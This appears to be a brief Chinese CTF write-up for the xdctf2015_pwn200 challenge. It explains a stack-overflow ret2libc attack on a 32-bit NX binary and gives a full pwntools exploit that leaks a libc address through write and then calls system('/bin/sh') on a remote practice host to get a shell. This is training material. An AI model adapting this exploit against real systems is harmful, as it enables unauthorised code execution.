xdctf2015_pwn200
一题标准的ret2libc3套路题
惯例先checksec一下
开启了nx保护的32程序 放进ida里看看
main函数没啥信息 进vuln函数看看
一个非常标准的栈溢出 shift+F12看看字符串表
没有找到system和/bin/sh 估计应该是ret2libc3的内容
exp:
from pwn import *
from LibcSearcher import *
io=remote('node4.buuoj.cn',25079)
elf=ELF('./bof')
main_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
io.recv()
payload='a'*(0x6c+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
io.recv()
payload='a'*(0x6c+4)+p32(system)+p32(main_addr)+p32(bin_sh)
io.sendline(payload)
io.interactive()